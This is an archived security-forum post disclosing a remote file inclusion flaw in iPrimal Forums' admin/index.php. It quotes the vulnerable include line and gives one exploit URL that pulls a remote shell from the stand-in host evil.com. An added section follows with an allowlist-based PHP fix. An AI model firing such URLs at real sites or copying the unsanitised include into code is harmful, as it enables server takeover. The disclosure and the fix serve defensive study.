EvilOctal Security Team Technical Discussion Group's Archiver

pub!1c 2006-11-12 12:42

iPrimal Forums (admin/index.php) Remote File Include Vulnerability

[code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
iPrimal Forums Remote File Inclusion
Download: http://ipigroup.org/downloads/forums.zip
Found by Bl0od3r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code:  #line 126-129
.....
if($_GET['p'] == ''){

echo 'Please select an item from the menu above.';

}else{

include($_GET['p'].'.php');
.....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected File:
/admin/index.php =]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability:
http://host.com/admin/index.php?p=http://evil.com/shell.txt?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz:evilcookie,eddy14,matrix_killer
Special Greetz to:str0ke!


[/code]
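
A hardened form of the include logic quoted in the advisory, added here as an example; it is not part of the original post or of the iPrimal code base. The page names in the allowlist and the `pages/` directory are assumptions.

```php
<?php
// Added example: allowlist-based replacement for include($_GET['p'].'.php').
// The page names and the pages/ directory below are hypothetical.

const ADMIN_PAGES = [
    'users'    => 'users.php',
    'forums'   => 'forums.php',
    'settings' => 'settings.php',
];

/**
 * Map a user-supplied page key to a file under $baseDir.
 * Returns the absolute path, or null if the key is not allowlisted
 * or the file does not resolve inside $baseDir.
 */
function resolve_admin_page($key, string $baseDir): ?string
{
    // Reject arrays (?p[]=x) and anything not in the fixed map.
    if (!is_string($key) || !array_key_exists($key, ADMIN_PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . ADMIN_PAGES[$key]);
    // realpath() returns false for missing files; also confirm containment.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$p = $_GET['p'] ?? '';
if ($p === '') {
    echo 'Please select an item from the menu above.';
} else {
    $file = resolve_admin_page($p, __DIR__ . '/pages');
    if ($file === null) {
        http_response_code(404);
        echo 'Unknown page.';
    } else {
        include $file; // path comes from the constant map, never from the request
    }
}
```

Setting `allow_url_include = Off` in php.ini stops `include` from fetching remote URLs, but the original line would still accept local paths, so the allowlist is the actual fix.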

© 1999-2008 EvilOctal Security Team